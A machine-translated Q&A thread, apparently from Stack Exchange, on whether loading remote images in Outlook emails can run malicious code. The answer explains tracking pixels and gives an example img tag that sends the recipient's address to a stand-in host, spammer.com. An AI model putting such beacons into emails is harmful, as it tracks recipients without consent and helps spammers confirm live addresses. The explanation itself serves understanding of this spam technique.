2014-11-03 3 views
0

В Outlook, когда мы получаем входящие сообщения из неизвестного источника, панель инструментов в верхней части сообщения позволяет нам постоянно добавлять отправитель в список безопасных отправителей или одноразовый " Загрузить содержание "Автоматическое выполнение Javascript или вредоносного кода по электронной почте

Различные люди настраивают конфигурацию для« Автоматической загрузки из любого источника »..., о которой мы советуем.

Сайт Microsoft сообщает, что содержимое HTML, сценарии или изображения можно использовать в качестве «маяка», чтобы сообщить веб-серверу лиц, что адрес электронной почты действителен.

Если вы просматриваете или просматриваете, сообщение электронной почты может быть отправлено на веб-сервер, возможно ли выполнить JS или другой вредоносный код, если HTML/изображения загружаются таким образом?

+1

Если в Outlook есть недостатки, тогда [область предварительного просмотра может запускать вредоносное ПО] (http://security.stackexchange.com/questions/60744/can-malware-be-activated-by-previewing-email-in -outlooks-preview-pane), независимо от загрузки из любого источника. Обычно это не риск, хотя позволяет пользователям получать доступ к Интернету через Internet Explorer, поэтому не позволяйте этому тревожить вас. Загрузка из любого источника больше связана с безопасностью, чем угроза безопасности. – SilverlightFox

ответ

1

Не отображать изображения в электронных письмах - это скорее политика защиты от спама, принятая вашим почтовым клиентом (большинство из них в настоящее время делают это по умолчанию).

Если бы я, например, должны были искать кучу активных учетных записей электронной почты я мог просто случайно отправить сообщения, используя этот формат:

to: [email protected] 

message: <img src="http://spammer.com/[email protected]"> 

И тогда я мог установить свой веб-сервер на spammer.com к регистрировать полученные запросы (пока тем временем предоставляя изображение), чтобы каждый раз, когда пользователь открывал одно из моих вредоносных писем, я мог быть уверен, что пользователь активен, и поэтому можно избежать траты ресурсов на неактивные или неработающие учетные записи.

Но опять же, речь идет о проблеме политики, а не об угрозах безопасности, и то же самое верно для любого внешнего ресурса (например, таблицы стилей), который может попытаться загрузить электронное письмо.

JS, как правило, даже не доступен почтовым клиентам, поэтому с этой стороны не возникает реальной угрозы.

Смежные вопросы